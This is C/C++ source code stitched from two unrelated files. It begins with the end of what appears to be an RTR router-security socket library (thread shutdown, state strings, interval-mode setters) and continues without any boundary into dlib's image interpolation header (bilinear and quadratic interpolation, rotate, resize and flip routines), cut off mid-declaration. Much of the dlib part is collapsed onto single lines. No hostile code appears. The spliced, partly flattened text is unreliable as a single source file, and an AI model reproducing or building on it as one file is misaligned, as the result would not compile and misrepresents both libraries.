			/* Same cancellation window as the transport-error path. */
			pthread_setcancelstate(PTHREAD_CANCEL_ENABLE, &oldcancelstate);
			sleep(rtr_socket->retry_interval);
			pthread_setcancelstate(PTHREAD_CANCEL_DISABLE, &oldcancelstate);
		} else if (rtr_socket->state == RTR_SHUTDOWN) {
			RTR_DBG1("State: RTR_SHUTDOWN");
			pthread_exit(NULL);
		}
	}
}

/*
 * Stop the FSM thread and clear all state derived from the session.
 * Cancels and joins the thread (cancellation can only fire inside the
 * windows opened in rtr_fsm_start), closes the transport, and removes
 * every record this socket contributed to the pfx/spki tables.
 * Safe to call when the socket was never started (thread_id == 0).
 */
void rtr_stop(struct rtr_socket *rtr_socket)
{
	RTR_DBG("%s()", __func__);
	rtr_change_socket_state(rtr_socket, RTR_SHUTDOWN);
	if (rtr_socket->thread_id != 0) {
		RTR_DBG1("pthread_cancel()");
		pthread_cancel(rtr_socket->thread_id);
		RTR_DBG1("pthread_join()");
		pthread_join(rtr_socket->thread_id, NULL);
		tr_close(rtr_socket->tr_socket);
		rtr_socket->request_session_id = true;
		rtr_socket->serial_number = 0;
		rtr_socket->last_update = 0;
		pfx_table_src_remove(rtr_socket->pfx_table, rtr_socket);
		spki_table_src_remove(rtr_socket->spki_table, rtr_socket);
		rtr_socket->thread_id = 0;
	}
	RTR_DBG1("Socket shut down");
}

/*
 * Map a socket state to its name. No bounds check: callers must pass a
 * state covered by socket_str_states (see NOTE on the array above).
 */
RTRLIB_EXPORT const char *rtr_state_to_str(enum rtr_socket_state state)
{
	return socket_str_states[state];
}

/* cppcheck-suppress unusedFunction */
/* Accessor for the interval handling mode set via rtr_init/rtr_set_interval_mode. */
RTRLIB_EXPORT enum rtr_interval_mode rtr_get_interval_mode(struct rtr_socket *rtr_socket)
{
	return rtr_socket->iv_mode;
}

/* cppcheck-suppress unusedFunction */
/*
 * Set the interval handling mode. Unknown values are rejected (logged,
 * mode left unchanged) so the socket never carries an invalid mode.
 */
RTRLIB_EXPORT void rtr_set_interval_mode(struct rtr_socket *rtr_socket, enum rtr_interval_mode option)
{
	switch (option) {
	case RTR_INTERVAL_MODE_IGNORE_ANY:
	case RTR_INTERVAL_MODE_ACCEPT_ANY:
	case RTR_INTERVAL_MODE_DEFAULT_MIN_MAX:
	case RTR_INTERVAL_MODE_IGNORE_ON_FAILURE:
		rtr_socket->iv_mode = option;
		break;
	default:
		RTR_DBG1("Invalid interval mode. Mode remains unchanged.");
	}
}
// Copyright (C) 2012 Davis E. King (davis@dlib.net) // License: Boost Software License See LICENSE.txt for the full license. #ifndef DLIB_INTERPOlATIONh_ #define DLIB_INTERPOlATIONh_ #include "interpolation_abstract.h" #include "../pixel.h" #include "../matrix.h" #include "assign_image.h" #include "image_pyramid.h" #include "../simd.h" #include "../image_processing/full_object_detection.h" namespace dlib { // ---------------------------------------------------------------------------------------- template <typename T> struct sub_image_proxy { sub_image_proxy ( T& img, rectangle rect ) { rect = rect.intersect(get_rect(img)); typedef typename image_traits<T>::pixel_type pixel_type; _nr = rect.height(); _nc = rect.width(); _width_step = width_step(img); _data = (char*)image_data(img) + sizeof(pixel_type)*rect.left() + rect.top()*_width_step; } void* _data; long _width_step; long _nr; long _nc; }; template <typename T> struct const_sub_image_proxy { const_sub_image_proxy ( const T& img, rectangle rect ) { rect = rect.intersect(get_rect(img)); typedef typename image_traits<T>::pixel_type pixel_type; _nr = rect.height(); _nc = rect.width(); _width_step = width_step(img); _data = (const char*)image_data(img) + sizeof(pixel_type)*rect.left() + rect.top()*_width_step; } const void* _data; long _width_step; long _nr; long _nc; }; template <typename T> struct image_traits<sub_image_proxy<T> > { typedef typename image_traits<T>::pixel_type pixel_type; }; template <typename T> struct image_traits<const sub_image_proxy<T> > { typedef typename image_traits<T>::pixel_type pixel_type; }; template <typename T> struct image_traits<const_sub_image_proxy<T> > { typedef typename image_traits<T>::pixel_type pixel_type; }; template <typename T> struct image_traits<const const_sub_image_proxy<T> > { typedef typename image_traits<T>::pixel_type pixel_type; }; template <typename T> inline long num_rows( const sub_image_proxy<T>& img) { return img._nr; } template <typename T> inline long 
num_columns( const sub_image_proxy<T>& img) { return img._nc; } template <typename T> inline long num_rows( const const_sub_image_proxy<T>& img) { return img._nr; } template <typename T> inline long num_columns( const const_sub_image_proxy<T>& img) { return img._nc; } template <typename T> inline void* image_data( sub_image_proxy<T>& img) { return img._data; } template <typename T> inline const void* image_data( const sub_image_proxy<T>& img) { return img._data; } template <typename T> inline const void* image_data( const const_sub_image_proxy<T>& img) { return img._data; } template <typename T> inline long width_step( const sub_image_proxy<T>& img ) { return img._width_step; } template <typename T> inline long width_step( const const_sub_image_proxy<T>& img ) { return img._width_step; } template < typename image_type > sub_image_proxy<image_type> sub_image ( image_type& img, const rectangle& rect ) { return sub_image_proxy<image_type>(img,rect); } template < typename image_type > const const_sub_image_proxy<image_type> sub_image ( const image_type& img, const rectangle& rect ) { return const_sub_image_proxy<image_type>(img,rect); } // ---------------------------------------------------------------------------------------- // ---------------------------------------------------------------------------------------- class interpolate_nearest_neighbor { public: template <typename image_view_type, typename pixel_type> bool operator() ( const image_view_type& img, const dlib::point& p, pixel_type& result ) const { COMPILE_TIME_ASSERT(pixel_traits<typename image_view_type::pixel_type>::has_alpha == false); if (get_rect(img).contains(p)) { assign_pixel(result, img[p.y()][p.x()]); return true; } else { return false; } } }; // ---------------------------------------------------------------------------------------- class interpolate_bilinear { template <typename T> struct is_rgb_image { const static bool value = pixel_traits<typename T::pixel_type>::rgb; }; public: template 
<typename T, typename image_view_type, typename pixel_type> typename disable_if<is_rgb_image<image_view_type>,bool>::type operator() ( const image_view_type& img, const dlib::vector<T,2>& p, pixel_type& result ) const { COMPILE_TIME_ASSERT(pixel_traits<typename image_view_type::pixel_type>::has_alpha == false); const long left = static_cast<long>(std::floor(p.x())); const long top = static_cast<long>(std::floor(p.y())); const long right = left+1; const long bottom = top+1; // if the interpolation goes outside img if (!(left >= 0 && top >= 0 && right < img.nc() && bottom < img.nr())) return false; const double lr_frac = p.x() - left; const double tb_frac = p.y() - top; double tl = 0, tr = 0, bl = 0, br = 0; assign_pixel(tl, img[top][left]); assign_pixel(tr, img[top][right]); assign_pixel(bl, img[bottom][left]); assign_pixel(br, img[bottom][right]); double temp = (1-tb_frac)*((1-lr_frac)*tl + lr_frac*tr) + tb_frac*((1-lr_frac)*bl + lr_frac*br); assign_pixel(result, temp); return true; } template <typename T, typename image_view_type, typename pixel_type> typename enable_if<is_rgb_image<image_view_type>,bool>::type operator() ( const image_view_type& img, const dlib::vector<T,2>& p, pixel_type& result ) const { COMPILE_TIME_ASSERT(pixel_traits<typename image_view_type::pixel_type>::has_alpha == false); const long left = static_cast<long>(std::floor(p.x())); const long top = static_cast<long>(std::floor(p.y())); const long right = left+1; const long bottom = top+1; // if the interpolation goes outside img if (!(left >= 0 && top >= 0 && right < img.nc() && bottom < img.nr())) return false; const double lr_frac = p.x() - left; const double tb_frac = p.y() - top; double tl, tr, bl, br; tl = img[top][left].red; tr = img[top][right].red; bl = img[bottom][left].red; br = img[bottom][right].red; const double red = (1-tb_frac)*((1-lr_frac)*tl + lr_frac*tr) + tb_frac*((1-lr_frac)*bl + lr_frac*br); tl = img[top][left].green; tr = img[top][right].green; bl = 
img[bottom][left].green; br = img[bottom][right].green; const double green = (1-tb_frac)*((1-lr_frac)*tl + lr_frac*tr) + tb_frac*((1-lr_frac)*bl + lr_frac*br); tl = img[top][left].blue; tr = img[top][right].blue; bl = img[bottom][left].blue; br = img[bottom][right].blue; const double blue = (1-tb_frac)*((1-lr_frac)*tl + lr_frac*tr) + tb_frac*((1-lr_frac)*bl + lr_frac*br); rgb_pixel temp; assign_pixel(temp.red, red); assign_pixel(temp.green, green); assign_pixel(temp.blue, blue); assign_pixel(result, temp); return true; } }; // ---------------------------------------------------------------------------------------- class interpolate_quadratic { template <typename T> struct is_rgb_image { const static bool value = pixel_traits<typename T::pixel_type>::rgb; }; public: template <typename T, typename image_view_type, typename pixel_type> typename disable_if<is_rgb_image<image_view_type>,bool>::type operator() ( const image_view_type& img, const dlib::vector<T,2>& p, pixel_type& result ) const { COMPILE_TIME_ASSERT(pixel_traits<typename image_view_type::pixel_type>::has_alpha == false); const point pp(p); // if the interpolation goes outside img if (!get_rect(img).contains(grow_rect(pp,1))) return false; const long r = pp.y(); const long c = pp.x(); const double temp = interpolate(p-pp, img[r-1][c-1], img[r-1][c ], img[r-1][c+1], img[r ][c-1], img[r ][c ], img[r ][c+1], img[r+1][c-1], img[r+1][c ], img[r+1][c+1]); assign_pixel(result, temp); return true; } template <typename T, typename image_view_type, typename pixel_type> typename enable_if<is_rgb_image<image_view_type>,bool>::type operator() ( const image_view_type& img, const dlib::vector<T,2>& p, pixel_type& result ) const { COMPILE_TIME_ASSERT(pixel_traits<typename image_view_type::pixel_type>::has_alpha == false); const point pp(p); // if the interpolation goes outside img if (!get_rect(img).contains(grow_rect(pp,1))) return false; const long r = pp.y(); const long c = pp.x(); const double red = interpolate(p-pp, 
img[r-1][c-1].red, img[r-1][c ].red, img[r-1][c+1].red, img[r ][c-1].red, img[r ][c ].red, img[r ][c+1].red, img[r+1][c-1].red, img[r+1][c ].red, img[r+1][c+1].red); const double green = interpolate(p-pp, img[r-1][c-1].green, img[r-1][c ].green, img[r-1][c+1].green, img[r ][c-1].green, img[r ][c ].green, img[r ][c+1].green, img[r+1][c-1].green, img[r+1][c ].green, img[r+1][c+1].green); const double blue = interpolate(p-pp, img[r-1][c-1].blue, img[r-1][c ].blue, img[r-1][c+1].blue, img[r ][c-1].blue, img[r ][c ].blue, img[r ][c+1].blue, img[r+1][c-1].blue, img[r+1][c ].blue, img[r+1][c+1].blue); rgb_pixel temp; assign_pixel(temp.red, red); assign_pixel(temp.green, green); assign_pixel(temp.blue, blue); assign_pixel(result, temp); return true; } private: /* tl tm tr ml mm mr bl bm br */ // The above is the pixel layout in our little 3x3 neighborhood. interpolate() will // fit a quadratic to these 9 pixels and then use that quadratic to find the interpolated // value at point p. inline double interpolate( const dlib::vector<double,2>& p, double tl, double tm, double tr, double ml, double mm, double mr, double bl, double bm, double br ) const { matrix<double,6,1> w; // x w(0) = (tr + mr + br - tl - ml - bl)*0.16666666666; // y w(1) = (bl + bm + br - tl - tm - tr)*0.16666666666; // x^2 w(2) = (tl + tr + ml + mr + bl + br)*0.16666666666 - (tm + mm + bm)*0.333333333; // x*y w(3) = (tl - tr - bl + br)*0.25; // y^2 w(4) = (tl + tm + tr + bl + bm + br)*0.16666666666 - (ml + mm + mr)*0.333333333; // 1 (constant term) w(5) = (tm + ml + mr + bm)*0.222222222 - (tl + tr + bl + br)*0.11111111 + (mm)*0.55555556; const double x = p.x(); const double y = p.y(); matrix<double,6,1> z; z = x, y, x*x, x*y, y*y, 1.0; return dot(w,z); } }; // ---------------------------------------------------------------------------------------- // ---------------------------------------------------------------------------------------- // 
----------------------------------------------------------------------------------------

    // Background policies for transform_image(): one of these is invoked for
    // every output pixel whose mapped source point falls outside the input
    // image (i.e. when the interpolator returns false).

    // Sets the pixel to 0 (black).
    class black_background
    {
    public:
        template <typename pixel_type>
        void operator() ( pixel_type& p) const { assign_pixel(p, 0); }
    };

    // Sets the pixel to 255 (white).
    class white_background
    {
    public:
        template <typename pixel_type>
        void operator() ( pixel_type& p) const { assign_pixel(p, 255); }
    };

    // Leaves the pixel unchanged.
    class no_background
    {
    public:
        template <typename pixel_type>
        void operator() ( pixel_type& ) const { }
    };

// ----------------------------------------------------------------------------------------

    // Fills the given area of out_img by mapping each output coordinate through
    // map_point into in_img and sampling with interp.  Pixels whose mapped point
    // can't be interpolated (outside in_img) are handed to set_background.
    // Requires: out_img contains area, and in_img/out_img are distinct objects.
    template <
        typename image_type1,
        typename image_type2,
        typename interpolation_type,
        typename point_mapping_type,
        typename background_type
        >
    void transform_image (
        const image_type1& in_img,
        image_type2& out_img,
        const interpolation_type& interp,
        const point_mapping_type& map_point,
        const background_type& set_background,
        const rectangle& area
    )
    {
        // make sure requires clause is not broken
        DLIB_ASSERT( get_rect(out_img).contains(area) == true &&
                     is_same_object(in_img, out_img) == false ,
            "\t void transform_image()"
            << "\n\t Invalid inputs were given to this function."
            << "\n\t get_rect(out_img).contains(area): " << get_rect(out_img).contains(area)
            << "\n\t get_rect(out_img): " << get_rect(out_img)
            << "\n\t area: " << area
            << "\n\t is_same_object(in_img, out_img): " << is_same_object(in_img, out_img)
            );

        const_image_view<image_type1> imgv(in_img);
        image_view<image_type2> out_imgv(out_img);

        for (long r = area.top(); r <= area.bottom(); ++r)
        {
            for (long c = area.left(); c <= area.right(); ++c)
            {
                // interp() returns false when the mapped point lies outside in_img;
                // in that case delegate the pixel to the background policy.
                if (!interp(imgv, map_point(dlib::vector<double,2>(c,r)), out_imgv[r][c]))
                    set_background(out_imgv[r][c]);
            }
        }
    }

// ----------------------------------------------------------------------------------------

    // Convenience overload: transforms the whole of out_img (area == its rect).
    template <
        typename image_type1,
        typename image_type2,
        typename interpolation_type,
        typename point_mapping_type,
        typename background_type
        >
    void transform_image (
        const image_type1& in_img,
        image_type2& out_img,
        const interpolation_type& interp,
        const point_mapping_type& map_point,
        const background_type& set_background
    )
    {
        // make sure requires clause is not broken
        DLIB_ASSERT( is_same_object(in_img, out_img) == false ,
            "\t void transform_image()"
            << "\n\t Invalid inputs were given to this function."
            << "\n\t is_same_object(in_img, out_img): " << is_same_object(in_img, out_img)
            );

        transform_image(in_img, out_img, interp, map_point, set_background, get_rect(out_img));
    }

// ----------------------------------------------------------------------------------------

    // Convenience overload: whole image, out-of-range pixels painted black.
    template <
        typename image_type1,
        typename image_type2,
        typename interpolation_type,
        typename point_mapping_type
        >
    void transform_image (
        const image_type1& in_img,
        image_type2& out_img,
        const interpolation_type& interp,
        const point_mapping_type& map_point
    )
    {
        // make sure requires clause is not broken
        DLIB_ASSERT( is_same_object(in_img, out_img) == false ,
            "\t void transform_image()"
            << "\n\t Invalid inputs were given to this function."
            << "\n\t is_same_object(in_img, out_img): " << is_same_object(in_img, out_img)
            );

        transform_image(in_img, out_img, interp, map_point, black_background(), get_rect(out_img));
    }

// ----------------------------------------------------------------------------------------

    // Rotates in_img counter-clockwise by `angle` (radians — presumably; confirm
    // against rotation_matrix()'s convention) into out_img, sizing out_img to the
    // rotated bounding box.  Returns the transform mapping points in in_img to
    // their locations in out_img (the inverse of the sampling transform used).
    template <
        typename image_type1,
        typename image_type2,
        typename interpolation_type
        >
    point_transform_affine rotate_image (
        const image_type1& in_img,
        image_type2& out_img,
        double angle,
        const interpolation_type& interp
    )
    {
        // make sure requires clause is not broken
        DLIB_ASSERT( is_same_object(in_img, out_img) == false ,
            "\t point_transform_affine rotate_image()"
            << "\n\t Invalid inputs were given to this function."
            << "\n\t is_same_object(in_img, out_img): " << is_same_object(in_img, out_img)
            );

        const rectangle rimg = get_rect(in_img);

        // figure out bounding box for rotated rectangle
        rectangle rect;
        rect += rotate_point(center(rimg), rimg.tl_corner(), -angle);
        rect += rotate_point(center(rimg), rimg.tr_corner(), -angle);
        rect += rotate_point(center(rimg), rimg.bl_corner(), -angle);
        rect += rotate_point(center(rimg), rimg.br_corner(), -angle);
        out_img.set_size(rect.height(), rect.width());

        // trans maps output points back into the input image (inverse mapping),
        // so the returned input->output transform is its inverse.
        const matrix<double,2,2> R = rotation_matrix(angle);
        point_transform_affine trans = point_transform_affine(R, -R*dcenter(get_rect(out_img)) + dcenter(rimg));
        transform_image(in_img, out_img, interp, trans);
        return inv(trans);
    }

// ----------------------------------------------------------------------------------------

    // Convenience overload: rotates using quadratic interpolation.
    template <
        typename image_type1,
        typename image_type2
        >
    point_transform_affine rotate_image (
        const image_type1& in_img,
        image_type2& out_img,
        double angle
    )
    {
        // make sure requires clause is not broken
        DLIB_ASSERT( is_same_object(in_img, out_img) == false ,
            "\t point_transform_affine rotate_image()"
            << "\n\t Invalid inputs were given to this function."
            << "\n\t is_same_object(in_img, out_img): " << is_same_object(in_img, out_img)
            );

        return rotate_image(in_img, out_img, angle, interpolate_quadratic());
    }

// ----------------------------------------------------------------------------------------

    namespace impl
    {
        // Point mapper used by resize_image(): scales an output coordinate to
        // its corresponding (fractional) input coordinate.
        class helper_resize_image
        {
        public:
            helper_resize_image(
                double x_scale_,
                double y_scale_
            ):
                x_scale(x_scale_),
                y_scale(y_scale_)
            {}

            dlib::vector<double,2> operator() (
                const dlib::vector<double,2>& p
            ) const
            {
                return dlib::vector<double,2>(p.x()*x_scale, p.y()*y_scale);
            }

        private:
            const double x_scale;
            const double y_scale;
        };
    }

    // Resizes in_img to fill out_img (out_img's current size determines the
    // scale) using the given interpolator.
    template <
        typename image_type1,
        typename image_type2,
        typename interpolation_type
        >
    void resize_image (
        const image_type1& in_img,
        image_type2& out_img,
        const interpolation_type& interp
    )
    {
        // make sure requires clause is not broken
        DLIB_ASSERT( is_same_object(in_img, out_img) == false ,
            "\t void resize_image()"
            << "\n\t Invalid inputs were given to this function."
            << "\n\t is_same_object(in_img, out_img): " << is_same_object(in_img, out_img)
            );

        // (dim-1)/(dim-1) scaling maps corner pixels onto corner pixels; the
        // max(...,1) guards against division by zero for 1-pixel-wide outputs.
        const double x_scale = (num_columns(in_img)-1)/(double)std::max<long>((num_columns(out_img)-1),1);
        const double y_scale = (num_rows(in_img)-1)/(double)std::max<long>((num_rows(out_img)-1),1);
        transform_image(in_img, out_img, interp,
                        dlib::impl::helper_resize_image(x_scale,y_scale));
    }

// ----------------------------------------------------------------------------------------

    // Compile-time predicate: true when the image's pixel type is RGB.
    template <typename image_type>
    struct is_rgb_image { const static bool value = pixel_traits<typename image_traits<image_type>::pixel_type>::rgb; };

    // Compile-time predicate: true when the image's pixel type is grayscale.
    template <typename image_type>
    struct is_grayscale_image { const static bool value = pixel_traits<typename image_traits<image_type>::pixel_type>::grayscale; };

    // This is an optimized version of resize_image for the case where bilinear
    // interpolation is used.
template < typename image_type1, typename image_type2 > typename disable_if_c<(is_rgb_image<image_type1>::value&&is_rgb_image<image_type2>::value) || (is_grayscale_image<image_type1>::value&&is_grayscale_image<image_type2>::value)>::type resize_image ( const image_type1& in_img_, image_type2& out_img_, interpolate_bilinear ) { // make sure requires clause is not broken DLIB_ASSERT( is_same_object(in_img_, out_img_) == false , "\t void resize_image()" << "\n\t Invalid inputs were given to this function." << "\n\t is_same_object(in_img_, out_img_): " << is_same_object(in_img_, out_img_) ); const_image_view<image_type1> in_img(in_img_); image_view<image_type2> out_img(out_img_); if (out_img.nr() <= 1 || out_img.nc() <= 1) { assign_all_pixels(out_img, 0); return; } typedef typename image_traits<image_type1>::pixel_type T; typedef typename image_traits<image_type2>::pixel_type U; const double x_scale = (in_img.nc()-1)/(double)std::max<long>((out_img.nc()-1),1); const double y_scale = (in_img.nr()-1)/(double)std::max<long>((out_img.nr()-1),1); double y = -y_scale; for (long r = 0; r < out_img.nr(); ++r) { y += y_scale; const long top = static_cast<long>(std::floor(y)); const long bottom = std::min(top+1, in_img.nr()-1); const double tb_frac = y - top; double x = -x_scale; if (pixel_traits<U>::grayscale) { for (long c = 0; c < out_img.nc(); ++c) { x += x_scale; const long left = static_cast<long>(std::floor(x)); const long right = std::min(left+1, in_img.nc()-1); const double lr_frac = x - left; double tl = 0, tr = 0, bl = 0, br = 0; assign_pixel(tl, in_img[top][left]); assign_pixel(tr, in_img[top][right]); assign_pixel(bl, in_img[bottom][left]); assign_pixel(br, in_img[bottom][right]); double temp = (1-tb_frac)*((1-lr_frac)*tl + lr_frac*tr) + tb_frac*((1-lr_frac)*bl + lr_frac*br); assign_pixel(out_img[r][c], temp); } } else { for (long c = 0; c < out_img.nc(); ++c) { x += x_scale; const long left = static_cast<long>(std::floor(x)); const long right = std::min(left+1, 
in_img.nc()-1); const double lr_frac = x - left; const T tl = in_img[top][left]; const T tr = in_img[top][right]; const T bl = in_img[bottom][left]; const T br = in_img[bottom][right]; T temp; assign_pixel(temp, 0); vector_to_pixel(temp, (1-tb_frac)*((1-lr_frac)*pixel_to_vector<double>(tl) + lr_frac*pixel_to_vector<double>(tr)) + tb_frac*((1-lr_frac)*pixel_to_vector<double>(bl) + lr_frac*pixel_to_vector<double>(br))); assign_pixel(out_img[r][c], temp); } } } } // ---------------------------------------------------------------------------------------- template < typename image_type > typename enable_if<is_grayscale_image<image_type> >::type resize_image ( const image_type& in_img_, image_type& out_img_, interpolate_bilinear ) { // make sure requires clause is not broken DLIB_ASSERT( is_same_object(in_img_, out_img_) == false , "\t void resize_image()" << "\n\t Invalid inputs were given to this function." << "\n\t is_same_object(in_img_, out_img_): " << is_same_object(in_img_, out_img_) ); const_image_view<image_type> in_img(in_img_); image_view<image_type> out_img(out_img_); if (out_img.nr() <= 1 || out_img.nc() <= 1) { assign_all_pixels(out_img, 0); return; } typedef typename image_traits<image_type>::pixel_type T; const double x_scale = (in_img.nc()-1)/(double)std::max<long>((out_img.nc()-1),1); const double y_scale = (in_img.nr()-1)/(double)std::max<long>((out_img.nr()-1),1); double y = -y_scale; for (long r = 0; r < out_img.nr(); ++r) { y += y_scale; const long top = static_cast<long>(std::floor(y)); const long bottom = std::min(top+1, in_img.nr()-1); const double tb_frac = y - top; double x = -4*x_scale; const simd4f _tb_frac = tb_frac; const simd4f _inv_tb_frac = 1-tb_frac; const simd4f _x_scale = 4*x_scale; simd4f _x(x, x+x_scale, x+2*x_scale, x+3*x_scale); long c = 0; for (;; c+=4) { _x += _x_scale; simd4i left = simd4i(_x); simd4f _lr_frac = _x-left; simd4f _inv_lr_frac = 1-_lr_frac; simd4i right = left+1; simd4f tlf = _inv_tb_frac*_inv_lr_frac; simd4f trf 
= _inv_tb_frac*_lr_frac; simd4f blf = _tb_frac*_inv_lr_frac; simd4f brf = _tb_frac*_lr_frac; int32 fleft[4]; int32 fright[4]; left.store(fleft); right.store(fright); if (fright[3] >= in_img.nc()) break; simd4f tl(in_img[top][fleft[0]], in_img[top][fleft[1]], in_img[top][fleft[2]], in_img[top][fleft[3]]); simd4f tr(in_img[top][fright[0]], in_img[top][fright[1]], in_img[top][fright[2]], in_img[top][fright[3]]); simd4f bl(in_img[bottom][fleft[0]], in_img[bottom][fleft[1]], in_img[bottom][fleft[2]], in_img[bottom][fleft[3]]); simd4f br(in_img[bottom][fright[0]], in_img[bottom][fright[1]], in_img[bottom][fright[2]], in_img[bottom][fright[3]]); simd4i out = simd4i(tlf*tl + trf*tr + blf*bl + brf*br); int32 fout[4]; out.store(fout); out_img[r][c] = static_cast<T>(fout[0]); out_img[r][c+1] = static_cast<T>(fout[1]); out_img[r][c+2] = static_cast<T>(fout[2]); out_img[r][c+3] = static_cast<T>(fout[3]); } x = -x_scale + c*x_scale; for (; c < out_img.nc(); ++c) { x += x_scale; const long left = static_cast<long>(std::floor(x)); const long right = std::min(left+1, in_img.nc()-1); const float lr_frac = x - left; float tl = 0, tr = 0, bl = 0, br = 0; assign_pixel(tl, in_img[top][left]); assign_pixel(tr, in_img[top][right]); assign_pixel(bl, in_img[bottom][left]); assign_pixel(br, in_img[bottom][right]); float temp = (1-tb_frac)*((1-lr_frac)*tl + lr_frac*tr) + tb_frac*((1-lr_frac)*bl + lr_frac*br); assign_pixel(out_img[r][c], temp); } } } // ---------------------------------------------------------------------------------------- template < typename image_type > typename enable_if<is_rgb_image<image_type> >::type resize_image ( const image_type& in_img_, image_type& out_img_, interpolate_bilinear ) { // make sure requires clause is not broken DLIB_ASSERT( is_same_object(in_img_, out_img_) == false , "\t void resize_image()" << "\n\t Invalid inputs were given to this function." 
<< "\n\t is_same_object(in_img_, out_img_): " << is_same_object(in_img_, out_img_) ); const_image_view<image_type> in_img(in_img_); image_view<image_type> out_img(out_img_); if (out_img.nr() <= 1 || out_img.nc() <= 1) { assign_all_pixels(out_img, 0); return; } typedef typename image_traits<image_type>::pixel_type T; const double x_scale = (in_img.nc()-1)/(double)std::max<long>((out_img.nc()-1),1); const double y_scale = (in_img.nr()-1)/(double)std::max<long>((out_img.nr()-1),1); double y = -y_scale; for (long r = 0; r < out_img.nr(); ++r) { y += y_scale; const long top = static_cast<long>(std::floor(y)); const long bottom = std::min(top+1, in_img.nr()-1); const double tb_frac = y - top; double x = -4*x_scale; const simd4f _tb_frac = tb_frac; const simd4f _inv_tb_frac = 1-tb_frac; const simd4f _x_scale = 4*x_scale; simd4f _x(x, x+x_scale, x+2*x_scale, x+3*x_scale); long c = 0; for (;; c+=4) { _x += _x_scale; simd4i left = simd4i(_x); simd4f lr_frac = _x-left; simd4f _inv_lr_frac = 1-lr_frac; simd4i right = left+1; simd4f tlf = _inv_tb_frac*_inv_lr_frac; simd4f trf = _inv_tb_frac*lr_frac; simd4f blf = _tb_frac*_inv_lr_frac; simd4f brf = _tb_frac*lr_frac; int32 fleft[4]; int32 fright[4]; left.store(fleft); right.store(fright); if (fright[3] >= in_img.nc()) break; simd4f tl(in_img[top][fleft[0]].red, in_img[top][fleft[1]].red, in_img[top][fleft[2]].red, in_img[top][fleft[3]].red); simd4f tr(in_img[top][fright[0]].red, in_img[top][fright[1]].red, in_img[top][fright[2]].red, in_img[top][fright[3]].red); simd4f bl(in_img[bottom][fleft[0]].red, in_img[bottom][fleft[1]].red, in_img[bottom][fleft[2]].red, in_img[bottom][fleft[3]].red); simd4f br(in_img[bottom][fright[0]].red, in_img[bottom][fright[1]].red, in_img[bottom][fright[2]].red, in_img[bottom][fright[3]].red); simd4i out = simd4i(tlf*tl + trf*tr + blf*bl + brf*br); int32 fout[4]; out.store(fout); out_img[r][c].red = static_cast<unsigned char>(fout[0]); out_img[r][c+1].red = static_cast<unsigned char>(fout[1]); 
out_img[r][c+2].red = static_cast<unsigned char>(fout[2]); out_img[r][c+3].red = static_cast<unsigned char>(fout[3]); tl = simd4f(in_img[top][fleft[0]].green, in_img[top][fleft[1]].green, in_img[top][fleft[2]].green, in_img[top][fleft[3]].green); tr = simd4f(in_img[top][fright[0]].green, in_img[top][fright[1]].green, in_img[top][fright[2]].green, in_img[top][fright[3]].green); bl = simd4f(in_img[bottom][fleft[0]].green, in_img[bottom][fleft[1]].green, in_img[bottom][fleft[2]].green, in_img[bottom][fleft[3]].green); br = simd4f(in_img[bottom][fright[0]].green, in_img[bottom][fright[1]].green, in_img[bottom][fright[2]].green, in_img[bottom][fright[3]].green); out = simd4i(tlf*tl + trf*tr + blf*bl + brf*br); out.store(fout); out_img[r][c].green = static_cast<unsigned char>(fout[0]); out_img[r][c+1].green = static_cast<unsigned char>(fout[1]); out_img[r][c+2].green = static_cast<unsigned char>(fout[2]); out_img[r][c+3].green = static_cast<unsigned char>(fout[3]); tl = simd4f(in_img[top][fleft[0]].blue, in_img[top][fleft[1]].blue, in_img[top][fleft[2]].blue, in_img[top][fleft[3]].blue); tr = simd4f(in_img[top][fright[0]].blue, in_img[top][fright[1]].blue, in_img[top][fright[2]].blue, in_img[top][fright[3]].blue); bl = simd4f(in_img[bottom][fleft[0]].blue, in_img[bottom][fleft[1]].blue, in_img[bottom][fleft[2]].blue, in_img[bottom][fleft[3]].blue); br = simd4f(in_img[bottom][fright[0]].blue, in_img[bottom][fright[1]].blue, in_img[bottom][fright[2]].blue, in_img[bottom][fright[3]].blue); out = simd4i(tlf*tl + trf*tr + blf*bl + brf*br); out.store(fout); out_img[r][c].blue = static_cast<unsigned char>(fout[0]); out_img[r][c+1].blue = static_cast<unsigned char>(fout[1]); out_img[r][c+2].blue = static_cast<unsigned char>(fout[2]); out_img[r][c+3].blue = static_cast<unsigned char>(fout[3]); } x = -x_scale + c*x_scale; for (; c < out_img.nc(); ++c) { x += x_scale; const long left = static_cast<long>(std::floor(x)); const long right = std::min(left+1, in_img.nc()-1); const 
double lr_frac = x - left; const T tl = in_img[top][left]; const T tr = in_img[top][right]; const T bl = in_img[bottom][left]; const T br = in_img[bottom][right]; T temp; assign_pixel(temp, 0); vector_to_pixel(temp, (1-tb_frac)*((1-lr_frac)*pixel_to_vector<double>(tl) + lr_frac*pixel_to_vector<double>(tr)) + tb_frac*((1-lr_frac)*pixel_to_vector<double>(bl) + lr_frac*pixel_to_vector<double>(br))); assign_pixel(out_img[r][c], temp); } } } // ---------------------------------------------------------------------------------------- template < typename image_type1, typename image_type2 > void resize_image ( const image_type1& in_img, image_type2& out_img ) { // make sure requires clause is not broken DLIB_ASSERT( is_same_object(in_img, out_img) == false , "\t void resize_image()" << "\n\t Invalid inputs were given to this function." << "\n\t is_same_object(in_img, out_img): " << is_same_object(in_img, out_img) ); resize_image(in_img, out_img, interpolate_bilinear()); } // ---------------------------------------------------------------------------------------- template < typename image_type1, typename image_type2 > point_transform_affine flip_image_left_right ( const image_type1& in_img, image_type2& out_img ) { // make sure requires clause is not broken DLIB_ASSERT( is_same_object(in_img, out_img) == false , "\t void flip_image_left_right()" << "\n\t Invalid inputs were given to this function." 
<< "\n\t is_same_object(in_img, out_img): " << is_same_object(in_img, out_img) ); assign_image(out_img, fliplr(mat(in_img))); std::vector<dlib::vector<double,2> > from, to; rectangle r = get_rect(in_img); from.push_back(r.tl_corner()); to.push_back(r.tr_corner()); from.push_back(r.bl_corner()); to.push_back(r.br_corner()); from.push_back(r.tr_corner()); to.push_back(r.tl_corner()); from.push_back(r.br_corner()); to.push_back(r.bl_corner()); return find_affine_transform(from,to); } // ---------------------------------------------------------------------------------------- template < typename image_type1, typename image_type2 > void flip_image_up_down ( const image_type1& in_img, image_type2& out_img ) { // make sure requires clause is not broken DLIB_ASSERT( is_same_object(in_img, out_img) == false , "\t void flip_image_up_down()" << "\n\t Invalid inputs were given to this function." << "\n\t is_same_object(in_img, out_img): " << is_same_object(in_img, out_img) ); assign_image(out_img, flipud(mat(in_img))); } // ---------------------------------------------------------------------------------------- namespace impl { inline rectangle 